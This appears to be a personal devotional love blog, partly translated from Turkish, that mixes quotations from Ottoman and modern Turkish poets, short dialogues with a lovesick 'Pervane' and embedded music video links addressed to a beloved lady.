\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nCevdet Paşa's hand touched my shoulder.\n\n_How I did not go mad from my joy, I still marvel_ +\n_In the moments I heard from your tongue the words \"I loved you\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nThe moon in the sky is shining; it is the fourteenth of the moon. \n\n_There are words for you in my heart_\n\nvideo::So6VlDiHukI[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nDede Efendi, what say you to this?\n\nvideo::vvFUnXpoUSE[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_\"I am telling it, without speaking at all,_ +\n_The way wheat pours out its heart...\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nA prayer falls upon my heart from Kays's tongue: +\n_\"Make my beloved's beauty increase as the days pass_ +\n_And as it comes, make me the worse afflicted with her pain\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n-_Why do you not speak in your own sentences?_ +\n-How am I to speak, while this state veils my reason? +\n-_Then why do you find yourself spokesmen and speak in their tongue?_ +\n-If my tongue spoke from my own heart, would this fire leave one green leaf? +\n-_Then why do you not fall silent?_ +\n-How can I be silent, conversing without pause with my own inside? +\n-_Have you any proof that she is aware?_ +\n-Can a moon be a stranger to the heart its light falls upon? +\n-_Until when will you moan so?_ +\n-Can one be made whole without slipping free of time's existence? +\n-_What is it you wait for?_ +\n-What is a moth to do before the candle is kindled? 
What I wait for is a light from her candle.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::asqjpUOo3YE[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nReason that will not let me sleep, how beautiful you are! \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nO Karacaoğlan, my state is plain to see; will it still not waken her? +\n_\"The moth cannot waken its candle_ +\n_Without passion in the head and fire in the heart\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nHope and patience, two siblings. How beautifully they embrace each other now. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI am so intoxicated that I feel no weariness from work, nor travel, nor school, nor the exam. And how should I not be intoxicated, when she has deigned to address this servant? \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nThat moon-faced one blew upon my wound, saying \"healing\" +\nBut she brought the fire within to a boil, and never knew\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nClumsily, perhaps impudently. It is not easy to speak words without their tangling on my tongue. +\nLet no day break at my window, I beg; the moon that lights my night is enough. +\n_In one breath's utterance the beloved falls into my remembrance_\n\nvideo::244526490[vimeo]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nA misgiving has seized Pervane; for how many nights now he neither sleeps nor lets me sleep. \"Do I grieve the candle with the things I say?\" he broods darkly. \"Is the candle, I wonder, pleased that the moth exists?\" I offered comfort; I tried to persuade him. It was no use. What am I to say; what am I to do? +\n*Pervane would look upon his own helplessness and his faults and fall into misgiving. 
Let the candle not grieve; the moth clung to the rope of trust in God, and so he slept.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nPervane has no confidant but me; to whom should he tell his state? To whom pour out his heart? He would let the tears flow from his eyes, but he fears they would give the secret away. So he keeps even his tears inside.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nIt seems they grieve the candle; it seems they leave her weary. And you, faithless Pervane, you too speak on and on of your own sorrow! \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nTo Şeyh Galib's prayer we say \"Amen!\" \n\n_\"May no one's wound stand in need of camphor_ +\n_May no one's moon-piece be far from their breast\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::nQh3bOwTnMg[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nJourneys, more than anything, set one thinking; the thoughts that never come otherwise catch you in the midst of darkness and desolation.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nOn my tongue, a prayer: \n\"Guard me from erring; from arrival without right course we take refuge in You. Show the ignorant one the way.\" \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nShould I truly write? It is as if you read even what I cannot write straight from my heart. 
Read, then, so its ache may lift from me.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nBashful and hesitant, afraid of causing hurt...\n\nvideo::245933662[vimeo]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n-_They break your heart, they weary your soul; how do you find healing?_ +\n-I read, again and again, the sentences of hers I keep like a trust, and find my remedy.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::QKnuIhKRWu0[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_\"I shall not turn away, though the world stand on one side and I on the other_ +\n_I am the moth to your candle; what need have I of fear_ +\n_Let the stranger grasp it, let the intimate know: I loved you\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nSince we have remembered him, today let Kâni speak too: \n\n_\"My moon, I would not trade you for the sun's own claw_ +\n_That pure breast I would not trade for the white breath of dawn\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nAt the summit of impudence, my shame at my side... What echoes is the voice of a year ago, and it is unlovely, I know. The one thing that makes it beautiful is the ears that will hear it. \n\n\"_Dear Friend,_ +\n_Schumann says: \"when playing, never mind who is listening.\" I, though, do mind who is listening._\" +\n\nhttps://vimeo.com/246656385\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nDon't take offense; there, like this... 
+\n_\"Durup dinlenmeden akarsa p\u0131nar,_ +\n_Her y\u0131l k\u0131\u015ftan sonra gelirse bahar,_ +\n_Bal\u0131klar\u0131n suyu sevdi\u011fi kadar,_ +\n_Ben de seni seviyorum, dar\u0131lma.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::rxamCTtodME[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBirka\u00e7 zorlu\u011fun i\u00e7inde kula\u00e7 atarken durdum, fark\u0131na vard\u0131m. \n\n_\"Sevgili Dost,_ +\n_Sen laz\u0131ms\u0131n bana! Ve \u00f6nemlisin hadiselerden.\"_\n\n_\"Sevgili Dost,_ +\n_Bug\u00fcn yazmak de\u011fil, konu\u015fmak istiyordum seninle. Ama yine yazd\u0131m.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::247592380[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::FfgLSNglfsY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMihrimah'da bulsa v\u00fccut.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNah\u00eef\u00ee sormu\u015f: +\n_\"G\u00f6z g\u00f6rd\u00fc g\u00f6n\u00fcl sevdi seni ey y\u00fcz\u00fc m\u00e2h\u0131m_ +\n_Kurb\u00e2n\u0131n olam var m\u0131 benim bunda g\u00fcn\u00e2h\u0131m\"_\u00a0\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Mevlam kulu sevdim seni_ \n\nvideo::MUZBPnjgzhw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAhmet Muhip Dranas'tan :\n\n_\"Bir g\u00fczelim sensin, bir de g\u00f6ky\u00fcz\u00fc,_ +\n_Gerisi denizler \u00f6tesi, hepsi._ +\n_G\u00f6ky\u00fcz\u00fcy\u00fcm g\u00fcnd\u00fcz\u00fcyle, gecesiyle,_ +\n_Sen g\u00fczelim a\u015fk\u0131yla, ne\u015fesiyle_ +\n_Uyumlu, esgin, el ele, ikiniz,_ +\n_Umutlarla bezer, g\u00f6nendirirsiniz_ +\n_\u00d6mr\u00fcm\u00fc, k\u0131y\u0131s\u0131nda bir ak\u015fam\u0131n.\"_ 

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

What can this poor soul say, when his tongue is tied in knots?

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::-mZqs6VEwRk[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_"kalbimin hüsnüyusuf mahrem bahçelerinde derindesin, rüya kadar derinde"_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

What could turn back a man who is angry at himself? The one who erred knows that an apology is no remedy for the mistake he made. Whether any remedy exists at all, that he does not know.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

To the one walking in the rain, +
_"Gülüşüne yağmur damlası çarpsa,_ +
_Şiir olur._ +
_Bunu bir ben bilirim,_ +
_Bir de gökyüzü."_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Kanat takıp uçurur da bu düşler_ +
_Uyandırır en tatlı yerinde_ +
_Gün ortasında sabah seherinde_ +
_Hatırlanır yeniden_

video::2H1oTjQ7fsI[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::yKMDy_AigLQ[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::kOxKvZJrUpA[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_"Zülf-i siyahı sâye-i perr-i Hümâ imiş_ +
_İklîm-i hüsne anun içün pâdişâ imiş"_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::PNTW_77bOho[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::kU4ppB06qMc[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Gün geldiyse..._

video::e-Y0IEoczj8[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Sana gelirim_

video::251945761[vimeo]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

This is why your lovely name has remained hidden.

https://twitter.com/iskenderpalanet/status/767788983829102592


✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

It cannot be, I know. Only a reminder, to myself and to my moon alike: +
_"Hâtırından çıkmasın lutfet hemân mehcûr olan_ +
_Olmasın bârî gönülden dûr gözden dûr olan"_ +

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Give praise all your life, O my lowly heart, even if it can never suffice... How did you fit a moon into your heart; how did you enter a moon's heart? Praise be...

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

If she said "Come," would you not go? +
One would go running, were leave but granted.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I am the captive of her tresses...

video::R_aC7EFFACM[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

They suppose I am angry and resentful. Never! Let me say it this way too, so that they may be convinced.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::ci2pe08q61M[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Would it be too much if I stole from Bâkî and sang? +

_"Hep seninçündür benim dünya cefâsın çektiğim_ +
_Yoksa ömrüm varı sensiz neylerim dünyâyı ben"_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How can snow burn one's insides? Each time it comes to mind: a joy, and a longing.

video::255248711[vimeo]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

I miss you...

video::255248790[vimeo]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::efpvLTrg7_o[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Good morning... 🌸🌺

video::m9gZyhNPYdY[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

If it were not for Bekir Bey, how would I ever say it?

video::2AE9iCE0Asw[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

It seems I have found peace in your voice, my lady.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Once upon a time, the hours ran short for some and long for others.
Some would weigh time in seconds, with an idle breath, with every beat of the heart. Is it called burning, or smouldering? He did not know then, and does not know now. In those days, in the meadow where he wandered hoping to hear a voice, ah, to find some trace of Her, She happened to utter these lines, and this poor heart sighed and wished they had been meant for him: +

_"Nice arz edem hele saz-ı dil-i dildara ben_ +
_Name göndersem kebuter iltemez biryan olur"_ +

Afterwards our moth-like owner of a heart overstepped his bounds and wrote this: +

_"Hayalinde vardır aşıkun vuslat ey ahsen_ +
_Maşuk okur mektubu hâkister-i kefterden_ +
_Ama naz edüp aşıkına elem ilen dersin sen_ +
_Nice arz edem hele saz-ı dil-i dildara ben_ +
_Name göndersem kebuter iltemez biryan olur"_ +

And what is it that drives our vagabond to such impertinence?

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Sadettin Hoca happened to play it for me:

_"Aşkındır bana güzelim yâdigâr"_

video::rdn0VZuoiss[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How good that she was born, that Mahrû!

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How lovely are the "we"s of which you are one half.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Good night; may God keep you. Take good care of your dear self 😊😊

_Hesitant to disturb you, I turned my path here instead. Whenever you happen to stop by, so be it. Good morning, good evening, good day..._

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

-What do you say, Pervane: is our shoe to be tossed onto the roof now as well? +
-You mind your own trouble, sir. I am always at Mahrû's side. And what a shameless man you are; would you be jealous of an infant? +
-Goodness, God forbid, I must have put it badly. Mine is not jealousy. Only a fear of being pushed aside. Besides, you speak as if you did not know how much I long for her auntie to see, to breathe in, that tiny innocent. What I mean to say is this: you will surely call on her; be certain to convey my state.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::D9A6zrFojj8[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

While the clock strains for it to be three, let me call out to you from here today; may I, my lady?

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

What is the expression "Don't be cross 👀" if not a joke? When the occasion calls for it, be cross, knit your brows, my lady. But know this: if ever for a moment he has slipped, this Pervane has never erred on purpose.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Necati Beg, how right you are; the morning breeze should be called to account.

_Ey sabâ yabanda mı buldun ayağı toprağın_ +
_Her göze ol tûtyâyı râyegân vermek neden_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

My dear lady

video::2hq8rHNsxfw[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How did the word _mübtelâ_ go again? What need to leaf through dictionaries for its meaning, when one may simply look at this poor wretch and see it.

video::Ebvr2nFovCM[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::hcRl8wsIlAs[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Very well then, my lady. That is to say: God willing :))

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Fuzuli wrote the first line looking at me, that much I understood; but the second line, I wonder, might it be for you?
👀

_"Olmadı ol mâha rûşen yanduğum hicrân günü_ +
_Yanduğun şeb tâ seher şem'ün ne bilsün âfitâb_ +

(That moon-like beauty never learned that I burned on the day of parting; the matter never came to light for her. How should the sun know that the candle burns all night until dawn?)

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Had I been a pen, my lady, your hand would have touched me; had I been paper, your face would have turned toward me. Alas, I turned out a human being and was left in Yemen. Though the one in Yemen is beside you too, of course; I nearly forgot that and made myself sad. +

You are beside me every moment, at every hour.

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How many times during the day I wanted to say it, and swallowed the words. Strange, to want something this much and yet shrink this much from saying it. You already know the sentence I wish to say 👀

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_..._ +
_likely to be misunderstood, removed :)_ +
_..._

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

How good it is that you exist, my lady. Whenever you see this note, know that I am smiling in your direction. 😌😌


✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

"My dear lady," my moon-faced, rose-faced lady...

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

The tulips have bloomed

video::vMbjeQl_FdY[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

Shall we have it again, from another voice? 👀

_Aman aman aman aaah gel yanıma_ +
_Ahu gözlüm şirin sözlüm_ +
_Aaaaah kızıl hançerim_ +
_Çağır canıma aksın kanım_ +
_Kurbanam o cana men_ +
_Aaaaah_

video::Y6vbfX0i5Hw[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::vg8WGEr-dPU[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_Ya Rab sevdiğimle beraber eyle_ +
_Gönlümü cânımı her bir ânımı_

Amen, amen, amen...

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_"Hep sen varsın"_ 💕

video::VXNISYc8uNI[youtube]


✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

🌷🌷

video::74R3ku58-t0[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

video::jSdJ7gr1-IE[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

_"Aşk-ı pâkün gamıyla şâd eyle_ +
_Yâr vaslıyla ber-murad eyle"_

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿


video::fdv_Bki-2aI[youtube]

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

You think you are being a bother; I, for my part, say to myself
"she values me enough to share her trouble with me," and I am glad. May you never see the face of trouble; and should you ever -no, no, not "should you"- should we ever, I am at your side. To be your partner in troubles, your confidante, your companion: what great happiness that would be...

✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿

This place was left orphaned for a while.

I do not know for whom Abdurrahim Karakoç Beyefendi said it, but when I say it, who it is for is plain :)

_"Aşktan yana söz duyunca_ +
_Ben hep seni düşünürüm._ +
